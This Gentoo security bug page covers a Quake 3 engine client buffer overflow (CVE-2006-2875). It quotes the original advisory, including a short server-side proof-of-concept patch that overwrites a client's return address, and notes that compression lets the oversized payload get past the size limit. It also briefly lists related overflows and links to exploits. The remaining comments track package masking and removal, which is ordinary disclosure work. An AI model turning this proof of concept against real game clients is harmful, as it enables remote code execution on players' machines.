Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!
Bug 135645 - games-fps/rtcw, enemy-territory, maybe more: Quake 3 Engine CL_ParseDownload Buffer Overflow (client-side only) (CVE-2006-2875)
Summary: games-fps/rtcw, enemy-territory, maybe more: Quake 3 Engine CL_ParseDownload ...
Status: RESOLVED FIXED
Alias: None
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities (show other bugs)
Hardware: All Linux
: High normal (vote)
Assignee: Gentoo Security
URL: http://aluigi.altervista.org/PRIVOXY-...
Whiteboard: B2 [upstream+ tomask] Falco
Keywords:
Depends on:
Blocks:
 
Reported: 2006-06-05 09:38 UTC by Raphael Marichez (Falco) (RETIRED)
Modified: 2019-12-08 21:28 UTC (History)
4 users (show)

See Also:
Package list:
Runtime testing required: ---


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Raphael Marichez (Falco) (RETIRED) gentoo-dev 2006-06-05 09:38:03 UTC
#######################################################################

                             Luigi Auriemma

Application:  Quake 3 engine
              http://www.idsoftware.com
              http://www.icculus.org/quake3/
Versions:     Quake 3               <= 1.32c
              Icculus.org Quake 3   <= revision 795
              other derived projects
Games:        exist many games which use the Quake 3 engine and
              probably they are all vulnerable but I'm not able and
              have no time to test them.
              An enough complete list of these games is available here:
                http://en.wikipedia.org/wiki/Quake_III_engine#Uses_of_the_engine
Platforms:    Windows, *nix, *BSD, Mac and others
Bug:          buffer-overflow in CL_ParseDownload
Exploitation: remote, versus client
Date:         02 Jun 2006
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bug
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


The Quake 3 engine is the famous game engine developed by id Software
(http://www.idsoftware.com) in the far 1999 but is still one of the
most used, licensed and played engines.
It has been released open source under the GPL license some months ago
and now it's mainly maintained by Icculus
(http://www.icculus.org/quake3/) although exist many other derived
projects.


#######################################################################

======
2) Bug
======


The CL_ParseDownload function located in code/client/cl_parse.c is used
by the clients for handling the download commands (svc_download)
received from the server.

The function uses a signed 16 bit number sent by the server for copying
raw data from the network to the data buffer of 16384 (MAX_MSGLEN)
bytes:

void CL_ParseDownload ( msg_t *msg ) {
    int     size;
    unsigned char data[MAX_MSGLEN];
    ...
    size = MSG_ReadShort ( msg );
    if (size > 0)
        MSG_ReadData( msg, data, size );
    ...

Some interesting details:
The (reassembled) packets handled by Quake 3 can be max 16384 bytes but
is possible to bypass this limit through the huffman compression used
automatically and trasparently in the engine (thanx to Thilo Schulz).
In short for exploiting this bug is enough to use 16384 NULL (0x00)
bytes, which occupy a very small amount of space, followed by the
usual "stuff" (return address to overwrite and shellcode).
The data copied with the MSG_ReadData is raw so there are no bad bytes
to avoid for the exploitation.
Note that the svc_download can be sent to the client in any moment so
the client can be attacked also immediately after the ending of the
connect handshake (just the first server's message).


#######################################################################

===========
3) The Code
===========


The server must be modified for sending the malformed svc_download
command and is possible to use the following instructions which
demonstrate how to overwrite the return address with 0x61616161.
It's enough to place them in code/server/sv_client.c just after the
"// send the gamestate" comment at about line 575:

    // send the gamestate
    int     i;
    MSG_WriteByte( &msg, svc_download );
    MSG_WriteShort( &msg, -1 );         // block != 0, for fast return
    MSG_WriteShort( &msg, 16384 + 32 ); // amount of bytes to copy
    for(i = 0; i < 16384; i++) {        // overwrite the data buffer
        MSG_WriteByte(&msg, 0x00);      // 0x00 for saving space
    }
    for(i = 0; i < 32; i++) {           // do the rest of the job
        MSG_WriteByte(&msg, 'a');       // return address: 0x61616161
    }
    SV_SendMessageToClient( &msg, client );
    return;


#######################################################################

======
4) Fix
======


Icculus will fix the code soon.
I have tried to contact id Software too but it's only time lost...
The developers of the other derived projects and games have not been
contacted (almost all the games are no longer supported and it's a bit
long for me to find and contact each single developer of the other
open source projects).


#######################################################################
Comment 1 Raphael Marichez (Falco) (RETIRED) gentoo-dev 2006-07-05 08:46:19 UTC
A new one, which is still in [upstream] status.
Impact: possible execution of arbitrary code with a malicious server.




Description:
RunningBon has reported two vulnerabilities in the Quake 3 Engine, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially compromise a user's system.

1) A boundary error exist in the "CG_ServerCommand()" function when receiving long server commands. This can be exploited to cause a stack-based buffer overflow via overly long server commands sent from the server.

Successful exploitation may allow arbitrary code execution, but requires that the user is e.g. tricked into connecting to a malicious server.

2) A boundary error exists in the handling of CS_ITEMs sent from a server. This can be exploited to cause a stack-based buffer overflow by sending overly long values to the client.

Successful exploitation may allow arbitrary code execution, but requires that the user is e.g. tricked into connecting to a malicious server.

Solution:
Only connect to trusted servers.

Provided and/or discovered by:
RunningBon

Original Advisory:
http://milw0rm.com/exploits/1976
http://milw0rm.com/exploits/1977
Comment 2 Matthias Geerdsen (RETIRED) gentoo-dev 2008-04-10 20:00:51 UTC
So this bug is about 1.5 years old and still in [upstream] status...
There still appear to be vulnerable packages in the tree

Actually I believe those should have been masked a long while ago, any comments on how to proceed here?
Comment 3 Matti Bickel (RETIRED) gentoo-dev 2008-12-07 12:06:56 UTC
At least the first bug has been fixed upstream. I dunno if the derivates are fixed, too.

We also ship games-fps/quake3-1.34_rc3 which should not be vulnerable anymore.
There's no earlier version of quake3 stable. So if this would be only about quake3, i'd say downgrade to ~2 and close RESO FIXED, no glsa.

I'm not changing anything b/c i'm not sure on the other two bugs and about updated ebuilds for the rest of the mentioned games.

Can somebody help here?
Comment 4 Matti Bickel (RETIRED) gentoo-dev 2008-12-07 12:17:50 UTC
I just checked the bugs mentioned in c#2: they are fixed in r813, that's way before the release of 1.34_rc3. So quake3 itself should be save to use.
Comment 5 Matti Bickel (RETIRED) gentoo-dev 2008-12-07 12:54:52 UTC
And the releases of rtcw, enemy-territory are about two months before the second advisories. I recommend masking them.

games herd?
Comment 6 Chris Reffett (RETIRED) gentoo-dev Security 2013-09-03 01:53:56 UTC
@games herd: I would like this bug to be resolved one way or another. Is anything still vulnerable, as far as you all can tell? Do we care if things are still vulnerable?
Comment 7 Aaron Bauman (RETIRED) gentoo-dev 2016-03-21 11:24:09 UTC
Is anyone against last-riting these packages?  Should those that are stable be dropped to unstable?

games-fps/rtcw
games-fps/enemy-territory
games-fps/enemy-territory-etpro
games-fps/enemy-territory-omnibot
games-fps/enemy-territory-truecombat

It seems this bug was fixed for rtcw which is unstable, however, all the other Quake 3 engine games are very difficult to confirm.  Thanks.
Comment 8 Lars Wendler (Polynomial-C) (RETIRED) gentoo-dev 2016-03-21 11:34:41 UTC
(In reply to Aaron Bauman from comment #7)
> Is anyone against last-riting these packages?  Should those that are stable
> be dropped to unstable?
> 
> games-fps/rtcw
> games-fps/enemy-territory
> games-fps/enemy-territory-etpro
> games-fps/enemy-territory-omnibot
> games-fps/enemy-territory-truecombat
> 
> It seems this bug was fixed for rtcw which is unstable, however, all the
> other Quake 3 engine games are very difficult to confirm.  Thanks.

I still play both games occasionally. Although for rtcw I started using the open source alternaive which can be found in the gamerlay-overlay (currently only single-player mode is supported by the ebuild): 

  https://cgit.gentoo.org/proj/gamerlay.git/tree/games-fps/rtcw

and for enemy-territory I'd love to see an ebuild in the tree for the open-source version (which is called etlegacy):

  https://bugs.gentoo.org/530130
Comment 9 Aaron Bauman (RETIRED) gentoo-dev 2016-03-21 11:43:07 UTC
(In reply to Lars Wendler (Polynomial-C) from comment #8)
> (In reply to Aaron Bauman from comment #7)
> > Is anyone against last-riting these packages?  Should those that are stable
> > be dropped to unstable?
> > 
> > games-fps/rtcw
> > games-fps/enemy-territory
> > games-fps/enemy-territory-etpro
> > games-fps/enemy-territory-omnibot
> > games-fps/enemy-territory-truecombat
> > 
> > It seems this bug was fixed for rtcw which is unstable, however, all the
> > other Quake 3 engine games are very difficult to confirm.  Thanks.
> 
> I still play both games occasionally. Although for rtcw I started using the
> open source alternaive which can be found in the gamerlay-overlay (currently
> only single-player mode is supported by the ebuild): 
> 
>   https://cgit.gentoo.org/proj/gamerlay.git/tree/games-fps/rtcw
> 
> and for enemy-territory I'd love to see an ebuild in the tree for the
> open-source version (which is called etlegacy):
> 
>   https://bugs.gentoo.org/530130

So folks have alternatives which is nice.  I am thinking last-rites may be in order here.  This vulnerability is extremely long standing.
Comment 10 Pacho Ramos gentoo-dev 2016-04-02 12:00:24 UTC
Well, my brothers are playing to enemy-territory nearly every day :/
Comment 11 Christopher Díaz Riveros (RETIRED) gentoo-dev Security 2017-07-20 12:00:53 UTC
Update:

the original project is now handled by 

https://ioquake3.org/

from the home page:

What is ioquake3?

ioquake3 is a free software first person shooter engine based on the Quake 3: Arena and Quake 3: Team Arena source code. The source code is licensed under the GPL version 2, and was first released under that license by id software on August 20th, 2005. Since then, we have been cleaning it up, fixing bugs, and adding features. 

Maybe there are some fixes regarding this bug
Comment 12 Larry the Git Cow gentoo-dev 2019-12-08 21:28:06 UTC
The bug has been closed via the following commit(s):

https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=4203956ca175dab36cde87b104806e09410f7fbd

commit 4203956ca175dab36cde87b104806e09410f7fbd
Author:     Aaron Bauman <bman@gentoo.org>
AuthorDate: 2019-12-08 21:26:36 +0000
Commit:     Aaron Bauman <bman@gentoo.org>
CommitDate: 2019-12-08 21:27:54 +0000

    games-fps/{enemy-territory,rtcw}: drop vulnerable pkgs
    
    Closes: https://bugs.gentoo.org/135645
    
    Signed-off-by: Aaron Bauman <bman@gentoo.org>

 games-fps/enemy-territory-omnibot/Manifest         |   2 -
 .../enemy-territory-omnibot-0.85.ebuild            |  20 ----
 games-fps/enemy-territory-omnibot/metadata.xml     |  12 --
 games-fps/enemy-territory-truecombat/Manifest      |   2 -
 .../enemy-territory-truecombat-0.49b.ebuild        |  36 ------
 games-fps/enemy-territory-truecombat/metadata.xml  |   8 --
 games-fps/enemy-territory/Manifest                 |   3 -
 .../enemy-territory-2.60b-r1.ebuild                | 124 ---------------------
 games-fps/enemy-territory/metadata.xml             |  11 --
 games-fps/rtcwmp-demo/Manifest                     |   1 -
 games-fps/rtcwmp-demo/files/rtcwmp-demo-ded.rc     |  24 ----
 games-fps/rtcwmp-demo/metadata.xml                 |  11 --
 games-fps/rtcwmp-demo/rtcwmp-demo-1.1-r2.ebuild    |  68 -----------
 games-fps/rtcwsp-demo/Manifest                     |   1 -
 games-fps/rtcwsp-demo/metadata.xml                 |  12 --
 games-fps/rtcwsp-demo/rtcwsp-demo-1.1b-r2.ebuild   |  55 ---------
 16 files changed, 390 deletions(-)